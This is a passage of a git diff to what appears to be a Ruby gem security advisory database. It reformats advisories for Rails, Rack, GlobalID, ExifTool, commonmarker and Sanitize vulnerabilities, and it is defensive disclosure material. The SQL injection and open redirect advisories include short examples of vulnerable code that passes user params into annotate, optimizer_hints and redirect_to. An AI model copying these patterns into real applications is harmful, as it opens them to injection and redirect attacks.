+  - "~> 2.2.6, >= 2.2.6.1"
+  - ">= 3.0.4.1"
+---
diff --git a/advisories/_posts/2023-01-18-CVE-2022-44572.md b/advisories/_posts/2023-01-18-CVE-2022-44572.md
index 7a8653bb..d3a2a6f2 100644
--- a/advisories/_posts/2023-01-18-CVE-2022-44572.md
+++ b/advisories/_posts/2023-01-18-CVE-2022-44572.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2022-44572 (rack): Denial of service via multipart parsing in Rack'
-comments: false
-categories:
-- rack
-advisory:
-  gem: rack
-  cve: 2022-44572
-  ghsa: rqv2-275x-2jq5
-  url: https://github.com/rack/rack/releases/tag/v3.0.4.1
-  title: Denial of service via multipart parsing in Rack
-  date: 2023-01-18
-  description: |
-    There is a denial of service vulnerability in the multipart parsing component
-    of Rack. This vulnerability has been assigned the CVE identifier
-    CVE-2022-44572.
-
-    Versions Affected: >= 2.0.0
-    Not affected: None.
-    Fixed Versions: 2.0.9.2, 2.1.4.2, 2.2.6.1, 3.0.4.1
-
-    # Impact
-
-    Carefully crafted input can cause RFC2183 multipart boundary parsing in Rack
-    to take an unexpected amount of time, possibly resulting in a denial of
-    service attack vector. Any applications that parse multipart posts using
-    Rack (virtually all Rails applications) are impacted.
-
-    # Workarounds
-
-    There are no feasible workarounds for this issue.
-  patched_versions:
-  - "~> 2.0.9, >= 2.0.9.2"
-  - "~> 2.1.4, >= 2.1.4.2"
-  - "~> 2.2.6, >= 2.2.6.1"
-  - ">= 3.0.4.1"
----
+---
+layout: advisory
+title: 'CVE-2022-44572 (rack): Denial of service via multipart parsing in Rack'
+comments: false
+categories:
+- rack
+advisory:
+  gem: rack
+  cve: 2022-44572
+  ghsa: rqv2-275x-2jq5
+  url: https://github.com/rack/rack/releases/tag/v3.0.4.1
+  title: Denial of service via multipart parsing in Rack
+  date: 2023-01-18
+  description: |
+    There is a denial of service vulnerability in the multipart parsing component
+    of Rack. This vulnerability has been assigned the CVE identifier
+    CVE-2022-44572.
+
+    Versions Affected: >= 2.0.0
+    Not affected: None.
+    Fixed Versions: 2.0.9.2, 2.1.4.2, 2.2.6.1, 3.0.4.1
+
+    # Impact
+
+    Carefully crafted input can cause RFC2183 multipart boundary parsing in Rack
+    to take an unexpected amount of time, possibly resulting in a denial of
+    service attack vector. Any applications that parse multipart posts using
+    Rack (virtually all Rails applications) are impacted.
+
+    # Workarounds
+
+    There are no feasible workarounds for this issue.
+  patched_versions:
+  - "~> 2.0.9, >= 2.0.9.2"
+  - "~> 2.1.4, >= 2.1.4.2"
+  - "~> 2.2.6, >= 2.2.6.1"
+  - ">= 3.0.4.1"
+---
diff --git a/advisories/_posts/2023-01-18-CVE-2023-22792.md b/advisories/_posts/2023-01-18-CVE-2023-22792.md
index a3998042..890d0d7a 100644
--- a/advisories/_posts/2023-01-18-CVE-2023-22792.md
+++ b/advisories/_posts/2023-01-18-CVE-2023-22792.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'CVE-2023-22792 (actionpack): ReDoS based DoS vulnerability in Action Dispatch'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2023-22792
-  ghsa: p84v-45xj-wwqj
-  url: https://github.com/rails/rails/releases/tag/v7.0.4.1
-  title: ReDoS based DoS vulnerability in Action Dispatch
-  date: 2023-01-18
-  description: |
-    There is a possible regular expression based DoS vulnerability in Action
-    Dispatch. This vulnerability has been assigned the CVE identifier
-    CVE-2023-22792.
-
-    Versions Affected: >= 3.0.0
-    Not affected: < 3.0.0
-    Fixed Versions: 6.1.7.1, 7.0.4.1
-
-    # Impact
-
-    Specially crafted cookies, in combination with a specially crafted
-    X_FORWARDED_HOST header can cause the regular expression engine to enter a
-    state of catastrophic backtracking. This can cause the process to use large
-    amounts of CPU and memory, leading to a possible DoS vulnerability All users
-    running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    # Workarounds
-
-    We recommend that all users upgrade to one of the FIXED versions. In the
-    meantime, users can mitigate this vulnerability by using a load balancer or
-    other device to filter out malicious X_FORWARDED_HOST headers before they
-    reach the application.
-  unaffected_versions:
-  - "< 3.0.0"
-  patched_versions:
-  - "~> 5.2.8"
-  - "~> 6.1.7, >= 6.1.7.1"
-  - ">= 7.0.4.1"
----
+---
+layout: advisory
+title: 'CVE-2023-22792 (actionpack): ReDoS based DoS vulnerability in Action Dispatch'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2023-22792
+  ghsa: p84v-45xj-wwqj
+  url: https://github.com/rails/rails/releases/tag/v7.0.4.1
+  title: ReDoS based DoS vulnerability in Action Dispatch
+  date: 2023-01-18
+  description: |
+    There is a possible regular expression based DoS vulnerability in Action
+    Dispatch. This vulnerability has been assigned the CVE identifier
+    CVE-2023-22792.
+
+    Versions Affected: >= 3.0.0
+    Not affected: < 3.0.0
+    Fixed Versions: 6.1.7.1, 7.0.4.1
+
+    # Impact
+
+    Specially crafted cookies, in combination with a specially crafted
+    X_FORWARDED_HOST header can cause the regular expression engine to enter a
+    state of catastrophic backtracking. This can cause the process to use large
+    amounts of CPU and memory, leading to a possible DoS vulnerability All users
+    running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    # Workarounds
+
+    We recommend that all users upgrade to one of the FIXED versions. In the
+    meantime, users can mitigate this vulnerability by using a load balancer or
+    other device to filter out malicious X_FORWARDED_HOST headers before they
+    reach the application.
+  unaffected_versions:
+  - "< 3.0.0"
+  patched_versions:
+  - "~> 5.2.8"
+  - "~> 6.1.7, >= 6.1.7.1"
+  - ">= 7.0.4.1"
+---
diff --git a/advisories/_posts/2023-01-18-CVE-2023-22794.md b/advisories/_posts/2023-01-18-CVE-2023-22794.md
index 6a28a1f5..223d95b4 100644
--- a/advisories/_posts/2023-01-18-CVE-2023-22794.md
+++ b/advisories/_posts/2023-01-18-CVE-2023-22794.md
@@ -1,71 +1,71 @@
----
-layout: advisory
-title: 'CVE-2023-22794 (activerecord): SQL Injection Vulnerability via ActiveRecord
-  comments'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2023-22794
-  ghsa: hq7p-j377-6v63
-  url: https://github.com/rails/rails/releases/tag/v7.0.4.1
-  title: SQL Injection Vulnerability via ActiveRecord comments
-  date: 2023-01-18
-  description: |
-    There is a possible vulnerability in ActiveRecord related to the
-    sanitization of comments. This vulnerability has been assigned the CVE
-    identifier CVE-2023-22794.
-
-    Versions Affected: >= 6.0.0
-    Not affected: < 6.0.0
-    Fixed Versions: 6.0.6.1, 6.1.7.1, 7.0.4.1
-
-    # Impact
-
-    Previously the implementation of escaping for comments was insufficient for
-
-    If malicious user input is passed to either the annotate query method, the
-    optimizer_hints query method, or through the QueryLogs interface which
-    automatically adds annotations, it may be sent to the database with
-    insufficient sanitization and be able to inject SQL outside of the comment.
-
-    In most cases these interfaces won’t be used with user input and users
-    should avoid doing so.
-
-    Example vulnerable code:
-    ```
-    Post.where(id: 1).annotate("#{params[:user_input]}")
-
-    Post.where(id: 1).optimizer_hints("#{params[:user_input]}")
-    ```
-
-    Example vulnerable QueryLogs configuration (the default configuration is not
-    vulnerable):
-    ```
-    config.active_record.query_log_tags = [
-      {
-        something: -> { <some value including user input> }
-      }
-    ]
-    ```
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    # Workarounds
-
-    Avoid passing user input to annotate and avoid using QueryLogs configuration
-    which can include user input.
-  cvss_v3: 8.8
-  unaffected_versions:
-  - "< 6.0.0"
-  patched_versions:
-  - "~> 6.0.6, >= 6.0.6.1"
-  - "~> 6.1.7, >= 6.1.7.1"
-  - ">= 7.0.4.1"
-  related:
-    url:
-    - https://github.com/rails/rails/commit/d7aba06953f9fa789c411676b941d20df8ef73de
----
+---
+layout: advisory
+title: 'CVE-2023-22794 (activerecord): SQL Injection Vulnerability via ActiveRecord
+  comments'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2023-22794
+  ghsa: hq7p-j377-6v63
+  url: https://github.com/rails/rails/releases/tag/v7.0.4.1
+  title: SQL Injection Vulnerability via ActiveRecord comments
+  date: 2023-01-18
+  description: |
+    There is a possible vulnerability in ActiveRecord related to the
+    sanitization of comments. This vulnerability has been assigned the CVE
+    identifier CVE-2023-22794.
+
+    Versions Affected: >= 6.0.0
+    Not affected: < 6.0.0
+    Fixed Versions: 6.0.6.1, 6.1.7.1, 7.0.4.1
+
+    # Impact
+
+    Previously the implementation of escaping for comments was insufficient for
+
+    If malicious user input is passed to either the annotate query method, the
+    optimizer_hints query method, or through the QueryLogs interface which
+    automatically adds annotations, it may be sent to the database with
+    insufficient sanitization and be able to inject SQL outside of the comment.
+
+    In most cases these interfaces won’t be used with user input and users
+    should avoid doing so.
+
+    Example vulnerable code:
+    ```
+    Post.where(id: 1).annotate("#{params[:user_input]}")
+
+    Post.where(id: 1).optimizer_hints("#{params[:user_input]}")
+    ```
+
+    Example vulnerable QueryLogs configuration (the default configuration is not
+    vulnerable):
+    ```
+    config.active_record.query_log_tags = [
+      {
+        something: -> { <some value including user input> }
+      }
+    ]
+    ```
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    # Workarounds
+
+    Avoid passing user input to annotate and avoid using QueryLogs configuration
+    which can include user input.
+  cvss_v3: 8.8
+  unaffected_versions:
+  - "< 6.0.0"
+  patched_versions:
+  - "~> 6.0.6, >= 6.0.6.1"
+  - "~> 6.1.7, >= 6.1.7.1"
+  - ">= 7.0.4.1"
+  related:
+    url:
+    - https://github.com/rails/rails/commit/d7aba06953f9fa789c411676b941d20df8ef73de
+---
diff --git a/advisories/_posts/2023-01-18-CVE-2023-22795.md b/advisories/_posts/2023-01-18-CVE-2023-22795.md
index 9604cd8c..5e580025 100644
--- a/advisories/_posts/2023-01-18-CVE-2023-22795.md
+++ b/advisories/_posts/2023-01-18-CVE-2023-22795.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'CVE-2023-22795 (actionpack): ReDoS based DoS vulnerability in Action Dispatch'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2023-22795
-  ghsa: 8xww-x3g3-6jcv
-  url: https://github.com/rails/rails/releases/tag/v7.0.4.1
-  title: ReDoS based DoS vulnerability in Action Dispatch
-  date: 2023-01-18
-  description: |
-    There is a possible regular expression based DoS vulnerability in Action
-    Dispatch related to the If-None-Match header. This vulnerability has been
-    assigned the CVE identifier CVE-2023-22795.
-
-    Versions Affected: All
-    Not affected: None
-    Fixed Versions: 6.1.7.1, 7.0.4.1
-
-    # Impact
-
-    A specially crafted HTTP If-None-Match header can cause the regular
-    expression engine to enter a state of catastrophic backtracking, when on a
-    version of Ruby below 3.2.0. This can cause the process to use large amounts
-    of CPU and memory, leading to a possible DoS vulnerability All users running
-    an affected release should either upgrade or use one of the workarounds
-    immediately.
-
-    # Workarounds
-
-    We recommend that all users upgrade to one of the FIXED versions. In the
-    meantime, users can mitigate this vulnerability by using a load balancer or
-    other device to filter out malicious If-None-Match headers before they reach
-    the application.
-
-    Users on Ruby 3.2.0 or greater are not affected by this vulnerability.
-  patched_versions:
-  - "~> 5.2.8"
-  - "~> 6.1.7, >= 6.1.7.1"
-  - ">= 7.0.4.1"
----
+---
+layout: advisory
+title: 'CVE-2023-22795 (actionpack): ReDoS based DoS vulnerability in Action Dispatch'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2023-22795
+  ghsa: 8xww-x3g3-6jcv
+  url: https://github.com/rails/rails/releases/tag/v7.0.4.1
+  title: ReDoS based DoS vulnerability in Action Dispatch
+  date: 2023-01-18
+  description: |
+    There is a possible regular expression based DoS vulnerability in Action
+    Dispatch related to the If-None-Match header. This vulnerability has been
+    assigned the CVE identifier CVE-2023-22795.
+
+    Versions Affected: All
+    Not affected: None
+    Fixed Versions: 6.1.7.1, 7.0.4.1
+
+    # Impact
+
+    A specially crafted HTTP If-None-Match header can cause the regular
+    expression engine to enter a state of catastrophic backtracking, when on a
+    version of Ruby below 3.2.0. This can cause the process to use large amounts
+    of CPU and memory, leading to a possible DoS vulnerability All users running
+    an affected release should either upgrade or use one of the workarounds
+    immediately.
+
+    # Workarounds
+
+    We recommend that all users upgrade to one of the FIXED versions. In the
+    meantime, users can mitigate this vulnerability by using a load balancer or
+    other device to filter out malicious If-None-Match headers before they reach
+    the application.
+
+    Users on Ruby 3.2.0 or greater are not affected by this vulnerability.
+  patched_versions:
+  - "~> 5.2.8"
+  - "~> 6.1.7, >= 6.1.7.1"
+  - ">= 7.0.4.1"
+---
diff --git a/advisories/_posts/2023-01-18-CVE-2023-22796.md b/advisories/_posts/2023-01-18-CVE-2023-22796.md
index 9fd6d1b3..06110ffd 100644
--- a/advisories/_posts/2023-01-18-CVE-2023-22796.md
+++ b/advisories/_posts/2023-01-18-CVE-2023-22796.md
@@ -1,49 +1,49 @@
----
-layout: advisory
-title: 'CVE-2023-22796 (activesupport): ReDoS based DoS vulnerability in Active Support’s
-  underscore'
-comments: false
-categories:
-- activesupport
-- rails
-advisory:
-  gem: activesupport
-  framework: rails
-  cve: 2023-22796
-  ghsa: j6gc-792m-qgm2
-  url: https://github.com/rails/rails/releases/tag/v7.0.4.1
-  title: ReDoS based DoS vulnerability in Active Support’s underscore
-  date: 2023-01-18
-  description: |
-    There is a possible regular expression based DoS vulnerability in Active
-    Support. This vulnerability has been assigned the CVE identifier
-    CVE-2023-22796.
-
-    Versions Affected: All
-    Not affected: None
-    Fixed Versions: 6.1.7.1, 7.0.4.1
-
-    # Impact
-
-    A specially crafted string passed to the underscore method can cause the
-    regular expression engine to enter a state of catastrophic backtracking.
-    This can cause the process to use large amounts of CPU and memory, leading
-    to a possible DoS vulnerability.
-
-    This affects String#underscore, ActiveSupport::Inflector.underscore,
-    String#titleize, and any other methods using these.
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    # Workarounds
-
-    There are no feasible workarounds for this issue.
-
-    Users on Ruby 3.2.0 or greater may be able to reduce the impact by
-    configuring Regexp.timeout.
-  patched_versions:
-  - "~> 5.2.8"
-  - "~> 6.1.7, >= 6.1.7.1"
-  - ">= 7.0.4.1"
----
+---
+layout: advisory
+title: 'CVE-2023-22796 (activesupport): ReDoS based DoS vulnerability in Active Support’s
+  underscore'
+comments: false
+categories:
+- activesupport
+- rails
+advisory:
+  gem: activesupport
+  framework: rails
+  cve: 2023-22796
+  ghsa: j6gc-792m-qgm2
+  url: https://github.com/rails/rails/releases/tag/v7.0.4.1
+  title: ReDoS based DoS vulnerability in Active Support’s underscore
+  date: 2023-01-18
+  description: |
+    There is a possible regular expression based DoS vulnerability in Active
+    Support. This vulnerability has been assigned the CVE identifier
+    CVE-2023-22796.
+
+    Versions Affected: All
+    Not affected: None
+    Fixed Versions: 6.1.7.1, 7.0.4.1
+
+    # Impact
+
+    A specially crafted string passed to the underscore method can cause the
+    regular expression engine to enter a state of catastrophic backtracking.
+    This can cause the process to use large amounts of CPU and memory, leading
+    to a possible DoS vulnerability.
+
+    This affects String#underscore, ActiveSupport::Inflector.underscore,
+    String#titleize, and any other methods using these.
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    # Workarounds
+
+    There are no feasible workarounds for this issue.
+
+    Users on Ruby 3.2.0 or greater may be able to reduce the impact by
+    configuring Regexp.timeout.
+  patched_versions:
+  - "~> 5.2.8"
+  - "~> 6.1.7, >= 6.1.7.1"
+  - ">= 7.0.4.1"
+---
diff --git a/advisories/_posts/2023-01-18-CVE-2023-22797.md b/advisories/_posts/2023-01-18-CVE-2023-22797.md
index ef3659c7..4ea64f00 100644
--- a/advisories/_posts/2023-01-18-CVE-2023-22797.md
+++ b/advisories/_posts/2023-01-18-CVE-2023-22797.md
@@ -1,50 +1,50 @@
----
-layout: advisory
-title: 'CVE-2023-22797 (actionpack): Open Redirect Vulnerability in Action Pack'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2023-22797
-  ghsa: 9445-4cr6-336r
-  url: https://github.com/rails/rails/releases/tag/v7.0.4.1
-  title: Open Redirect Vulnerability in Action Pack
-  date: 2023-01-18
-  description: |
-    There is a vulnerability in Action Controller’s redirect_to. This
-    vulnerability has been assigned the CVE identifier CVE-2023-22797.
-
-    Versions Affected: >= 7.0.0
-    Not affected: < 7.0.0
-    Fixed Versions: 7.0.4.1
-
-    # Impact
-
-    There is a possible open redirect when using the redirect_to helper with
-    untrusted user input.
-
-    Vulnerable code will look like this:
-    ```
-    redirect_to(params[:some_param])
-    ```
-
-    Rails 7.0 introduced protection against open redirects from calling
-    redirect_to with untrusted user input. In prior versions the developer was
-    fully responsible for only providing trusted input. However the check
-    introduced could be bypassed by a carefully crafted URL.
-
-    All users running an affected release should either upgrade or use one of
-    the workarounds immediately.
-
-    # Workarounds
-
-    There are no feasible workarounds for this issue.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 7.0.0"
-  patched_versions:
-  - ">= 7.0.4.1"
----
+---
+layout: advisory
+title: 'CVE-2023-22797 (actionpack): Open Redirect Vulnerability in Action Pack'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2023-22797
+  ghsa: 9445-4cr6-336r
+  url: https://github.com/rails/rails/releases/tag/v7.0.4.1
+  title: Open Redirect Vulnerability in Action Pack
+  date: 2023-01-18
+  description: |
+    There is a vulnerability in Action Controller’s redirect_to. This
+    vulnerability has been assigned the CVE identifier CVE-2023-22797.
+
+    Versions Affected: >= 7.0.0
+    Not affected: < 7.0.0
+    Fixed Versions: 7.0.4.1
+
+    # Impact
+
+    There is a possible open redirect when using the redirect_to helper with
+    untrusted user input.
+
+    Vulnerable code will look like this:
+    ```
+    redirect_to(params[:some_param])
+    ```
+
+    Rails 7.0 introduced protection against open redirects from calling
+    redirect_to with untrusted user input. In prior versions the developer was
+    fully responsible for only providing trusted input. However the check
+    introduced could be bypassed by a carefully crafted URL.
+
+    All users running an affected release should either upgrade or use one of
+    the workarounds immediately.
+
+    # Workarounds
+
+    There are no feasible workarounds for this issue.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 7.0.0"
+  patched_versions:
+  - ">= 7.0.4.1"
+---
diff --git a/advisories/_posts/2023-01-18-CVE-2023-22799.md b/advisories/_posts/2023-01-18-CVE-2023-22799.md
index a7d04363..35edef6e 100644
--- a/advisories/_posts/2023-01-18-CVE-2023-22799.md
+++ b/advisories/_posts/2023-01-18-CVE-2023-22799.md
@@ -1,37 +1,37 @@
----
-layout: advisory
-title: 'CVE-2023-22799 (globalid): ReDoS based DoS vulnerability in GlobalID'
-comments: false
-categories:
-- globalid
-advisory:
-  gem: globalid
-  cve: 2023-22799
-  ghsa: 23c2-gwp5-pxw9
-  url: https://github.com/rails/globalid/releases/tag/v1.0.1
-  title: ReDoS based DoS vulnerability in GlobalID
-  date: 2023-01-18
-  description: |
-    There is a ReDoS based DoS vulnerability in the GlobalID gem. This
-    vulnerability has been assigned the CVE identifier CVE-2023-22799.
-
-    Versions Affected: >= 0.2.1
-    Not affected: < 0.2.1
-    Fixed Versions: 1.0.1
-
-    # Impact
-
-    There is a possible DoS vulnerability in the model name parsing section
-    of the GlobalID gem. Carefully crafted input can cause the regular
-    expression engine to take an unexpected amount of time. All users running
-    an affected release should either upgrade or use one of the workarounds
-    immediately.
-
-    # Workarounds
-
-    There are no feasible workarounds for this issue.
-  unaffected_versions:
-  - "< 0.2.1"
-  patched_versions:
-  - ">= 1.0.1"
----
+---
+layout: advisory
+title: 'CVE-2023-22799 (globalid): ReDoS based DoS vulnerability in GlobalID'
+comments: false
+categories:
+- globalid
+advisory:
+  gem: globalid
+  cve: 2023-22799
+  ghsa: 23c2-gwp5-pxw9
+  url: https://github.com/rails/globalid/releases/tag/v1.0.1
+  title: ReDoS based DoS vulnerability in GlobalID
+  date: 2023-01-18
+  description: |
+    There is a ReDoS based DoS vulnerability in the GlobalID gem. This
+    vulnerability has been assigned the CVE identifier CVE-2023-22799.
+
+    Versions Affected: >= 0.2.1
+    Not affected: < 0.2.1
+    Fixed Versions: 1.0.1
+
+    # Impact
+
+    There is a possible DoS vulnerability in the model name parsing section
+    of the GlobalID gem. Carefully crafted input can cause the regular
+    expression engine to take an unexpected amount of time. All users running
+    an affected release should either upgrade or use one of the workarounds
+    immediately.
+
+    # Workarounds
+
+    There are no feasible workarounds for this issue.
+  unaffected_versions:
+  - "< 0.2.1"
+  patched_versions:
+  - ">= 1.0.1"
+---
diff --git a/advisories/_posts/2023-01-20-GHSA-q95h-cqrv-8jv5.md b/advisories/_posts/2023-01-20-GHSA-q95h-cqrv-8jv5.md
index 30dd24da..e7354bfe 100644
--- a/advisories/_posts/2023-01-20-GHSA-q95h-cqrv-8jv5.md
+++ b/advisories/_posts/2023-01-20-GHSA-q95h-cqrv-8jv5.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'GHSA-q95h-cqrv-8jv5 (exiftool_vendored): ExifTool vulnerable to arbitrary
-  code execution'
-comments: false
-categories:
-- exiftool_vendored
-advisory:
-  gem: exiftool_vendored
-  ghsa: q95h-cqrv-8jv5
-  url: https://github.com/exiftool-rb/exiftool_vendored.rb/security/advisories/GHSA-q95h-cqrv-8jv5
-  title: ExifTool vulnerable to arbitrary code execution
-  date: 2023-01-20
-  description: |
-    ### Impact
-    Arbitrary code execution can occur when running `exiftool` against files with hostile metadata payloads
-
-    ### Patches
-    ExifTool has already been patched in version 12.24. `exiftool_vendored.rb`, which vendors ExifTool, includes this patch in [v12.25.0](https://github.com/exiftool-rb/exiftool_vendored.rb/releases/tag/v12.25.0).
-
-    ### Workarounds
-    No
-  cvss_v3: 7.8
-  patched_versions:
-  - ">= 12.25.0"
-  related:
-    url:
-    - https://twitter.com/wcbowling/status/1385803927321415687
-    cve:
-    - 2021-22204
----
+---
+layout: advisory
+title: 'GHSA-q95h-cqrv-8jv5 (exiftool_vendored): ExifTool vulnerable to arbitrary
+  code execution'
+comments: false
+categories:
+- exiftool_vendored
+advisory:
+  gem: exiftool_vendored
+  ghsa: q95h-cqrv-8jv5
+  url: https://github.com/exiftool-rb/exiftool_vendored.rb/security/advisories/GHSA-q95h-cqrv-8jv5
+  title: ExifTool vulnerable to arbitrary code execution
+  date: 2023-01-20
+  description: |
+    ### Impact
+    Arbitrary code execution can occur when running `exiftool` against files with hostile metadata payloads
+
+    ### Patches
+    ExifTool has already been patched in version 12.24. `exiftool_vendored.rb`, which vendors ExifTool, includes this patch in [v12.25.0](https://github.com/exiftool-rb/exiftool_vendored.rb/releases/tag/v12.25.0).
+
+    ### Workarounds
+    No
+  cvss_v3: 7.8
+  patched_versions:
+  - ">= 12.25.0"
+  related:
+    url:
+    - https://twitter.com/wcbowling/status/1385803927321415687
+    cve:
+    - 2021-22204
+---
diff --git a/advisories/_posts/2023-01-24-GHSA-636f-xm5j-pj9m.md b/advisories/_posts/2023-01-24-GHSA-636f-xm5j-pj9m.md
index f15890e0..4f79a91b 100644
--- a/advisories/_posts/2023-01-24-GHSA-636f-xm5j-pj9m.md
+++ b/advisories/_posts/2023-01-24-GHSA-636f-xm5j-pj9m.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'GHSA-636f-xm5j-pj9m (commonmarker): Several quadratic complexity bugs may
-  lead to denial of service in Commonmarker'
-comments: false
-categories:
-- commonmarker
-advisory:
-  gem: commonmarker
-  ghsa: 636f-xm5j-pj9m
-  url: https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-636f-xm5j-pj9m
-  title: Several quadratic complexity bugs may lead to denial of service in Commonmarker
-  date: 2023-01-24
-  description: |
-    ## Impact
-
-    Several quadratic complexity bugs in commonmarker's underlying [`cmark-gfm`](https://github.com/github/cmark-gfm)
-    library may lead to unbounded resource exhaustion and subsequent denial of service.
-
-    The following vulnerabilities were addressed:
-
-    * [CVE-2023-22483](https://github.com/github/cmark-gfm/security/advisories/GHSA-29g3-96g3-jg6c)
-    * [CVE-2023-22484](https://github.com/github/cmark-gfm/security/advisories/GHSA-24f7-9frr-5h2r)
-    * [CVE-2023-22485](https://github.com/github/cmark-gfm/security/advisories/GHSA-c944-cv5f-hpvr)
-    * [CVE-2023-22486](https://github.com/github/cmark-gfm/security/advisories/GHSA-r572-jvj2-3m8p)
-
-    For more information, consult the release notes for version
-    [`0.23.0.gfm.7`](https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.7).
-
-    ## Mitigation
-
-    Users are advised to upgrade to commonmarker version [`0.23.7`](https://rubygems.org/gems/commonmarker/versions/0.23.7).
-  patched_versions:
-  - ">= 0.23.7"
-  related:
-    cve:
-    - 2023-22483
-    - 2023-22484
-    - 2023-22485
-    - 2023-22486
-    ghsa:
-    - 29g3-96g3-jg6c
-    - 24f7-9frr-5h2r
-    - c944-cv5f-hpvr
-    - r572-jvj2-3m8p
----
+---
+layout: advisory
+title: 'GHSA-636f-xm5j-pj9m (commonmarker): Several quadratic complexity bugs may
+  lead to denial of service in Commonmarker'
+comments: false
+categories:
+- commonmarker
+advisory:
+  gem: commonmarker
+  ghsa: 636f-xm5j-pj9m
+  url: https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-636f-xm5j-pj9m
+  title: Several quadratic complexity bugs may lead to denial of service in Commonmarker
+  date: 2023-01-24
+  description: |
+    ## Impact
+
+    Several quadratic complexity bugs in commonmarker's underlying [`cmark-gfm`](https://github.com/github/cmark-gfm)
+    library may lead to unbounded resource exhaustion and subsequent denial of service.
+
+    The following vulnerabilities were addressed:
+
+    * [CVE-2023-22483](https://github.com/github/cmark-gfm/security/advisories/GHSA-29g3-96g3-jg6c)
+    * [CVE-2023-22484](https://github.com/github/cmark-gfm/security/advisories/GHSA-24f7-9frr-5h2r)
+    * [CVE-2023-22485](https://github.com/github/cmark-gfm/security/advisories/GHSA-c944-cv5f-hpvr)
+    * [CVE-2023-22486](https://github.com/github/cmark-gfm/security/advisories/GHSA-r572-jvj2-3m8p)
+
+    For more information, consult the release notes for version
+    [`0.23.0.gfm.7`](https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.7).
+
+    ## Mitigation
+
+    Users are advised to upgrade to commonmarker version [`0.23.7`](https://rubygems.org/gems/commonmarker/versions/0.23.7).
+  patched_versions:
+  - ">= 0.23.7"
+  related:
+    cve:
+    - 2023-22483
+    - 2023-22484
+    - 2023-22485
+    - 2023-22486
+    ghsa:
+    - 29g3-96g3-jg6c
+    - 24f7-9frr-5h2r
+    - c944-cv5f-hpvr
+    - r572-jvj2-3m8p
+---
diff --git a/advisories/_posts/2023-01-28-CVE-2023-23627.md b/advisories/_posts/2023-01-28-CVE-2023-23627.md
index bbcaac30..0058939b 100644
--- a/advisories/_posts/2023-01-28-CVE-2023-23627.md
+++ b/advisories/_posts/2023-01-28-CVE-2023-23627.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2023-23627 (sanitize): Improper neutralization of `noscript` element content
-  may allow XSS in Sanitize'
-comments: false
-categories:
-- sanitize
-advisory:
-  gem: sanitize
-  cve: 2023-23627
-  ghsa: fw3g-2h3j-qmm7
-  url: https://github.com/rgrove/sanitize/security/advisories/GHSA-fw3g-2h3j-qmm7
-  title: Improper neutralization of `noscript` element content may allow XSS in Sanitize
-  date: 2023-01-28
-  description: |
-    ### Impact
-
-    Using carefully crafted input, an attacker may be able to sneak arbitrary HTML through Sanitize `>= 5.0.0, < 6.0.1` when Sanitize is configured with a custom allowlist that allows `noscript` elements. This could result in XSS (cross-site scripting) or other undesired behavior when that HTML is rendered in a browser.
-
-    Sanitize's default configs don't allow `noscript` elements and are not vulnerable. This issue only affects users who are using a custom config that adds `noscript` to the element allowlist.
-
-    ### Patches
-
-    Sanitize `>= 6.0.1` always removes `noscript` elements and their contents, even when `noscript` is in the allowlist.
-
-    ### Workarounds
-
-    Users who are unable to upgrade can prevent this issue by using one of Sanitize's default configs or by ensuring that their custom config does not include `noscript` in the element allowlist.
-
-    ### Details
-
-    The root cause of this issue is that HTML parsing rules treat the contents of a `noscript` element differently depending on whether scripting is enabled in the user agent. Nokogiri (the HTML parser Sanitize uses) doesn't support scripting so it follows the "scripting disabled" rules, but a web browser with scripting enabled will follow the "scripting enabled" rules. This means that Sanitize can't reliably make the contents of a `noscript` element safe for scripting enabled browsers. The safest thing to do is to remove the element and its contents entirely, which is now what Sanitize does in version 6.0.1 and later.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 5.0.0"
-  patched_versions:
-  - ">= 6.0.1"
-  related:
-    url:
-    - https://github.com/rgrove/sanitize/commit/ec14265e530dc3fe31ce2ef773594d3a97778d22
-    - https://github.com/rgrove/sanitize/releases/tag/v6.0.1
----
+---
+layout: advisory
+title: 'CVE-2023-23627 (sanitize): Improper neutralization of `noscript` element content
+  may allow XSS in Sanitize'
+comments: false
+categories:
+- sanitize
+advisory:
+  gem: sanitize
+  cve: 2023-23627
+  ghsa: fw3g-2h3j-qmm7
+  url: https://github.com/rgrove/sanitize/security/advisories/GHSA-fw3g-2h3j-qmm7
+  title: Improper neutralization of `noscript` element content may allow XSS in Sanitize
+  date: 2023-01-28
+  description: |
+    ### Impact
+
+    Using carefully crafted input, an attacker may be able to sneak arbitrary HTML through Sanitize `>= 5.0.0, < 6.0.1` when Sanitize is configured with a custom allowlist that allows `noscript` elements. This could result in XSS (cross-site scripting) or other undesired behavior when that HTML is rendered in a browser.
+
